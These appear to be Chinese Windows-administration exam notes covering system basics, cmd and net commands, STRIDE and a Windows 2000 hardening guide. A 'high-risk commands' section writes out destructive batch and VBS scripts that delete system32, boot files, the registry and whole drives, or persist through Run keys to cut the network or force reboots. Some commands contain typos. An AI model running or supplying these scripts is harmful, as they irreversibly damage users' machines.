admin管理员组文章数量:1652578
Windows 发展史
Windows 3.0 1990年 出现图形化界面
Windows 95 1995年 第一个不用安装 MS-DOS 的系统
Windows NT 1996年 出现服务器版本
Windows XP 2001年 个人计算机的里程碑
Windows 7 2009年 推出简易版、家庭版、专业版、企业版、普通版多个版本
Windows server 2012 R2 目前企业服务器版本中使用最多的一种
系统目录
user目录是用户配置文件,不包括用户安装的软件
program files 和program files(x86)是一样的,只不过(x86)是用来安装32位软件的
Windows是系统目录,包括system、system32、addins等
磁盘主要文件目录 intel、perflogs、program files 和program files(x86)、user、Windows-----程序、应用程序、用户、系统
documents and setings/用户
桌面、开始菜单、application data:通用应用程序文件夹、favorites:收藏夹、local setting:保存应用临时数据、历史和临时文件,可清理
my documents:我的文档
program files 常见文件夹
common files:公用程序文件夹,比如微软,Adobe等软件
complus application 微软com+组件使用的文件夹,删除后com+组件可能无法使用
difx:高效的xml索引方法,不可删除
Xerox:用作自带的一些图形处理软件的临时空间
program data
目录位程序数据目录,是隐藏的
注册表
注册表自启动项HKCU、HKLM中存在,且run的上一级为currentversion
服务的生命周期
状态:start、stop、running、–pending
服务的生命周期没有sleep状态,服务得一直运行,持续运行且不可见的应用,可以通过net start+服务名来启动服务。
线程进程
线程-进程-程序
同一进程中的线程共同享有资源,不同进程中的线程相互之间是隔离的,
Windows常用命令
win + r
cmd 进入系统
regedit 注册表
services.msc 系统服务
calc 计算器
mstsc 远程桌面
gpedit.msc 组策略
win+r+cmd
ping
ping ip -t ping指定的主机直到停止,结束Ctrl+c
ping ip -n count 指定ping几条,默认4条
ipconfig 查看主机IP配置
net
net start/stop+ 服务名 开启关闭服务 如mysql
net user + 用户名 查看用户状态
net user 用户名 密码/add 添加用户默认为user组
net user 用户名 密码/del 删除用户
net user 用户名 /activity: yes/no 激活/禁用 用户
net localgroup /add 提权
映射对磁盘到本地盘,得是本地不存在的磁盘eg h
文件命令
dir 列出当前目录下的子目录
cls 清屏
cd 进入指定目录
copy
diskcopy 复制磁盘
del
format 格式化磁盘
md 建立子目录
move
more 分屏显示内容
rd 删除目录
tree 列出目录树
STRIDE
-
Spoofing 就是伪装,比如我用别人的ID发言就是Identity Spoofing, 我想到用变化IP的办法就是IP Spoofing.
-
Tampering 就是篡改,比如我用别人ID发言的手段就是篡改了合法包,而他们的server端没有相应的检查措施。
-
Repudiation 就是拒绝承认,比如我进行了这些攻击,他们并不知道是我做的,也没有证据是我做的,我就可以不承认。
-
Information Disclosure 就是信息的泄漏,比如他们的那串数字图片就没有任何保护,图片上的信息轻易的就被别人得到了。
-
Denial of Services 就是拒绝服务,比如我的自动发帖使得正常用户无法使用就是这种攻击。
-
Elevation of Privileges 就是权限的提升,比如我尝试用管理员的权限去做事情,就是属于这种。
保护数据安全
应用层、物理层、网络层、操作系统。CIA:安全三元–机密性、完整性、可用性。
为保证系统安全,应该优化和关注注册表的哪些方面
1.影子用户啊
2.用户登录自启动
3.开机自启动
4.IE浏览器是否被篡改
5.映像劫持
6.修改文件关联
HKEY_CLASSES_ROOT\textfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\textfile\shell\open\command
7.设置对注册表工具(Regedit.exe)的运行限制
8.设置对注册表键的访问权限
9.安全设置控制对注册表的远程访问Windows的注册表不仅可本地访问还可远程访问。
10.部署审核监视用户对注册表的操作
高危操作命令
1 蓝屏死机
Del %windowsdrive%*.* /f /s /q Shutdown -s -f -t 0
2 更改文件后缀名
Ren *.doc *.txt Ren *.jpeg *.txt Ren *.lnk *.txt Ren *.avi *.txt Ren *.mpeg *.txt Ren * *.txt Ren *.bat *.txt
3 删除system32
Del c:\windows\system32*.* /q
4 使PC永久崩溃
@echo off Attrib -r -s -h c:\autoexec.bat Del c:\autoexec.bat Attrib -r -s -h c:\boot.ini Del c:\boot.ini Attrib -r -s -h c:\ntldr Del c:\ ntldr Attrib -r -s -h c:\windows\win.ini Del c:\windows\win.ini
5 删除所有的注册表
@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*
6 永久禁用网络
echo @echo off>c:\windows\wimn32.bat echo break off>>c:\windows\wimn32.bat echo ipconfig/release_all>>c:\windowswimn32.bat echo end>>c:\windows\wimn32.bat reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVision\Run /v CONTROLexit /t reg_sz /d c:/Windows/wimn32.bat /f Pause
7 一直按回车
(这个要保存为.vbs) Set wshShell=wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys"~(enter)" loop
8 启动电脑后自动关机
echo @echo off>c:\Windows\hartlell.bat echo break off>>c:\Windows\hartlell.bat echo shutdown -r -t 11 -f>>c:\Windows\hartlell.bat echo end>>c:\Windows\hartlell.bat reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windwos\CurrentVersion\Run /v startAPI /t reg_sz /d c:\Windows\hartlell.bat /f reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v /t reg_sz /d c:\Windows\hartlell.bat /f pause
9 开启CD蜂鸣器
(这个也是.vbs格式) Set oWMP=CreateObject(“WMPlayer.OCX.7”) Set colCDROMs=oWMP.cdromCollection do if colCDROMs.Count>=1 then For i=0 to colCDROMs.Count -1 colCDROMs.Item(i).Eject Next For i=0 to colCDROMs.Count -1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop 10. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\
新的操作系统怎么设置其安全
一、安装过程
网络连接
在安装完成Windows
2000操作系统后,不要立即连入网络,因为这时系统上的各种程序还没有打上补丁,存在各种漏洞,非常容易感染病毒和被入侵,此时应该安装杀毒软件和[URL=http://www.bingdun]防火墙[/URL]。杀毒软件和[URL=http://www.bingdun]防火墙[/URL]推荐使用诺顿企业版客户端(若做服务器则用服务端)和黑冰(Blackice)[URL=http://www.bingdun]防火墙[/URL]。接着,再把下面的事情做完后再上网。
二、正确设置和管理账户
1、停止使用Guest账户,并给Guest加一个复杂的密码。所谓的复杂密码就是密码含大小写字母、数字、特殊字符(~!@#¥%《》,。?)等。比如象:“G7Y3,^)y。
2、账户要尽可能少,并且要经常用一些扫描工具查看一下系统账户、账户权限及密码。删除停用的账户,常用的扫描软件有:流光、HSCAN、X-SCAN、STAT SCANNER等。正确配置账户的权限,密码至少应不少于8位,比如:“3H.#4d&j1)~w”,呵呵……让他破吧!!这样的密码他可能把机子跑烂也跑不出来哦_
3、增加登录的难度,在“账户策略→密码策略”中设定:“密码复杂性要求启用”,“密码长度最小值8位”,“强制密码历史5次”,“最长存留期
30天”;在“账户策略→账户锁定策略”设定:“账户锁定3次错误登录”,“锁定时间30分钟”,“复位锁定计数30分钟”等,增加了登录的难度对系统的安全大有好处。
4、把系统Administrator账号改名,名称不要带有Admin等字样;
创建一个陷阱帐号,如创建一个名为“Administrator”的本地帐户,把权限设置成最低,什么事也干不了,并且加上一个超过10位的超级复杂密码。这样可以让那些“不法之徒”忙上一段时间了,并且可以借此发现他们的入侵企图。
三、网络服务安全管理
1、关闭不需要的服务
只留必需的服务,多一些服务可能会给系统带来更多的安全因素。如Windows 2000的Terminal
Services(终端服务)、IIS(web服务)、RAS(远程访问服务)等,这些都有产生漏洞的可能。
2、关闭不用的端口。
3、只开放服务需要的端口与协议。
具体方法为:按顺序打开“网上邻居→属性→本地连接→属性→Internet
协议→属性→高级→选项→TCP/IP筛选→属性”,添加需要的TCP、UDP端口以及IP协议即可。根据服务开设口,常用的TCP口有:80口用于Web服务;21用于FTP服务;25口用于SMTP;23口用于Telnet服务;110口用于POP3。常用的UDP端口有:53口-DNS域名解析服务;161口-snmp简单的网络管理协议。8000、4000用于OICQ,服务器用8000来接收信息,客户端用4000发送信息。如果没有上面这些服务就没有必要打开这些端口。
4、禁止建立空连接
Windows2000的默认安装允许任何用户可通过空连接连上服务器,枚举账号并猜测密码。空连接用的端口是139,通过空连接,可以复制文件到远端服务器,计划执行一个任务,这就是一个漏洞。可以通过以下两种方法禁止建立空连接:
(1)
修改注册表中Local_Machine/System/CurrentControlSet/Control/LSA-RestrictAnonymous
的值为1。
(2)修改Windows
2000的本地安全策略。设置“本地安全策略→本地策略→选项”中的RestrictAnonymous(匿名连接的额外限制)为“不容许枚举SAM账号和共享”。
Windows2000的默认安装允许任何用户通过空连接得到系统所有账号和共享列表,这本来是为了方便局域网用户共享资源和文件的,但是,同时任何一个远程用户也可以通过同样的方法得到您的用户列表,并可能使用暴力法破解用户密码给整个网络带来破坏。很多人都只知道更改注册表Local_Machine/System/CurrentControlSet/Control/LSA-RestrictAnonymous
= 1来禁止空用户连接,实际上Windows
2000的本地安全策略里(如果是域服务器就是在域服务器安全和域安全策略里)就有RestrictAnonymous选项,其中有三个值:“0”这个值是系统默认的,没有任何限制,远程用户可以知道您机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum)等;“1”这个值是只允许非NULL用户存取SAM账号信息和共享信息;“2”这个值只有Windows
2000才支持,需要注意的是,如果使用了这个值,就不能再共享资源了,所以还是推荐把数值设为“1”比较好。
四、关闭无用端口和修改3389端口
Windows的每一项服务都对应相应的端口,比如众如周知的WWW服务的端口是80,smtp是25,ftp是21,win2000安装中这些服务都是默认开启的。对于个人用户来说确实没有必要,关掉端口也就是关闭了无用的服务。
关闭这些无用的服务可以通过“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口:关闭Simple
TCP/IP Service,支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及
Quote of the Day。
2、关闭80口:关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing
Service",通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口:关闭Simple Mail Transport
Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。
4、关掉21端口:关闭FTP Publishing
Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP
连接和管理。
5、关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务,此服务提供
RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享,比如ipc[URL=http://hackbase/News/vip/#]KaTeX parse error: Expected 'EOF', got '#' at position 43: …e/News/vip/#̲][/URL]、admin[URL=http://hackbase/News/vip/#]$[/URL]等等,此服务关闭不影响您的共他操作。
7、还有一个就是139端口,139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放既认为是NT机,现在好了。
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
对于个人用户来说,可以在以上各项服务属性设置中设为“禁用”,以免下次重启服务也重新启动后端口再次打开。现在你不用担心你的端口和默认共享了。
8、修改3389
打开注册表HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal
Server/Wds/Repwd/Tds/Tcp,
看到那个PortNumber没有?0xd3d,这个是16进制,就是3389啦。我改XXXX这个值是RDP(远程桌面协议)的默认值,也就是说用来配置以后新建的RDP服务的,要改已经建立的RDP服务,我们去下一个键值:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/WinStations这里应该有一个或多个类似RDP-TCP的子健(取决于你建立了多少个RDP服务),一样改掉PortNumber。
五、本地安全策略
A、通过建立IP策略来阻止端口连接
TCP端口:21(FTP,换FTP端口)23(TELNET),53(DNS),135,136,137,138,139,443,445,1028,1433,3389
TCP端口:1080,3128,6588,8080(以上为代理端口).25(SMTP),161(SNMP),67(引导)
UDP端口:1434(这个就不用说了吧)
阻止所有ICMP,即阻止PING命令
B、在这里我用关闭135端口来实例讲解
1.创建IP筛选器和筛选器操作
a.“开始”->“程序”->“管理工具”->“本地安全策略”.微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的.
b.右击"Ip安全策略,在本地机器",选择"管理 IP 筛选器表和筛选器操作",启动管理 IP
筛选器表和筛选器操作对话框.我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略.
c.在"管理 IP 筛选器表"中,按"添加"按钮建立新的IP筛选器:
1)在跳出的IP筛选器列表对话框内,填上合适的名称,我们这儿使用"tcp135",描述随便填写.单击右侧的"添加…“按钮,启动IP筛选器向导.
2)跳过欢迎对话框,下一步.
3)在IP通信源页面,源地方选"任何IP地址”,因为我们要阻止传入的访问.下一步.
4)在IP通信目标页面,目标地址选"我的IP地址".下一步.
5)在IP协议类型页面,选择"TCP".下一步.
6)在IP协议端口页面,选择"到此端口"并设置为"135",其它不变.下一步.
7)完成.关闭IP筛选器列表对话框.会发现tcp135IP筛选器出现在IP筛选器列表中.
d.选择"管理筛选器操作"标签,创建一个拒绝操作:
1)单击"添加"按钮,启动"筛选器操作向导",跳过欢迎页面,下一步.
2)在筛选器操作名称页面,填写名称,这儿填写"拒绝".下一步.
3)在筛选器操作常规选项页面,将行为设置为"阻止".下一步.
4)完成.
e、关闭"管理 IP 筛选器表和筛选器操作"对话框.
2.创建IP安全策略
1.右击"Ip安全策略,在本地机器",选择"创建IP安全策略",启动IP安全策略向导.跳过欢迎页面,下一步.
2.在IP安全策略名称页面,填写合适的IP安全策略名称,这儿我们可以填写"拒绝对tcp135端口的访问",描述可以随便填写.下一步.
3.在安全通信要求页面,不选择"激活默认响应规则".下一步.
4.在完成页面,选择"编辑属性".完成.
5.在"拒绝对tcp135端口的访问属性"对话框中进行设置.首先设置规则:
1)单击下面的"添加…“按钮,启动安全规则向导.跳过欢迎页面,下一步.
2)在隧道终结点页面,选择默认的"此规则不指定隧道”.下一步.
3)在网络类型页面,选择默认的"所有网络连接".下一步.
4)在身份验证方法页面,选择默认的"windows 2000默认值(Kerberos V5 协议)".下一步.
5)在IP筛选器列表页面选择我们刚才建立的"tcp135"筛选器.下一步.
6)在筛选器操作页面,选择我们刚才建立的"拒绝"操作.下一步.
7)在完成页面,不选择"编辑属性",确定.
6.关闭"拒绝对tcp135端口的访问属性"对话框.
3.指派和应用IPsec安全策略
1)缺省情况下,任何IPsec安全策略都未被指派.首先我们要对新建立的安全策略进行指派.在本地安全策略MMC中,右击我们刚刚建立的"“拒绝对tcp135端口的访问属性"安全策略,选择"指派”.
2)立即刷新组策略.使用"secedit /refreshpolicy
machine_policy"命令可立即刷新组策略.
六、审核策略
具体方法:控制面板==》管理工具==》本地安全策略==》本地策略==》审核策略,然后右键点击下列各项,选择“安全性”来设置就可以了。
审核策略更改:成功,失败
审核登录事件:成功,失败
审核对象访问:失败
审核对象追踪:成功,失败
审核目录服务访问:失败
审核特权使用:失败
审核系统事件:成功,失败
审核账户登录事件:成功,失败
审核账户管理:成功,失败
密码策略:启用“密码必须符合复杂性要求","密码长度最小值"为6个字符,"强制密码历史"为5次,"密码最长存留期"为30天.
在账户锁定策略中设置:"复位账户锁定计数器"为30分钟之后,"账户锁定时间"为30分钟,“账户锁定值"为30分钟.
安全选项设置:本地安全策略本地策略安全选项==对匿名连接的额外限制,双击对其中有效策略进行设置,选择"不允许枚举SAM账号和共享”,因为这个值是只允许非NULL用户存取SAM账号信息和共享信息,一般选择此项,然后再禁止登录屏幕上显示上次登录的用户名。
禁止登录屏幕上显示上次登录的用户名也可以改注册表HKEY_LOCAL_MACHINE/SOFTTWARE/Microsoft/WindowsNT/CurrentVesion/Winlogn项中的Don’t
Display Last User
Name串,将其数据修改为1
七、Windows日志文件的保护
日志文件对我们如此重要,因此不能忽视对它的保护,防止发生某些“不法之徒”将日志文件清洗一空的情况。
1.
修改日志文件存放目录
Windows日志文件默认路径是“%systemroot%/system32/config”,我们可以通过修改注册表来改变它的存储目录,来增强对日志的保护。
点击“开始→运行”,在对话框中输入“Regedit”,回车后弹出注册表编辑器,依次展开“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog”后,下面的Application、Security、System几个子项分别对应应用程序日志、安全日志、系统日志。
我以应用程序日志为例,将其转移到“d:abc”目录下。首先选中Application子项,在右栏中找到File键,其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”,将它修改为“d:abc/AppEvent.Evt”。接着在D盘新建“abc”目录,将“AppEvent.Evt”拷贝到该目录下,重新启动系统,这样就完成了应用程序日志文件存放目录的修改。其它类型日志文件路径修改方法相同,只是在不同的子项下操作。
2.
设置文件访问权限
修改了日志文件的存放目录后,日志还是可以被清空的,下面通过修改日志文件访问权限,防止这种事情发生,前提是Windows系统要采用NTFS文件系统格式。
右键点击D盘的CCE目录,选择“属性”,切换到“安全”标签页后,首先取消“允许将来自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框中选中“Everyone”账号,只给它赋予“读取”权限;然后点击“添加”按钮,将“System”账号添加到账号列表框中,赋予除“完全控制”和“修改”以外的所有权限,最后点击“确定”按钮。这样当用户清除Windows日志时,就会弹出错误对话框
本文标签:
版权声明:本文标题:第一次 周考 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1729599389a1207768.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论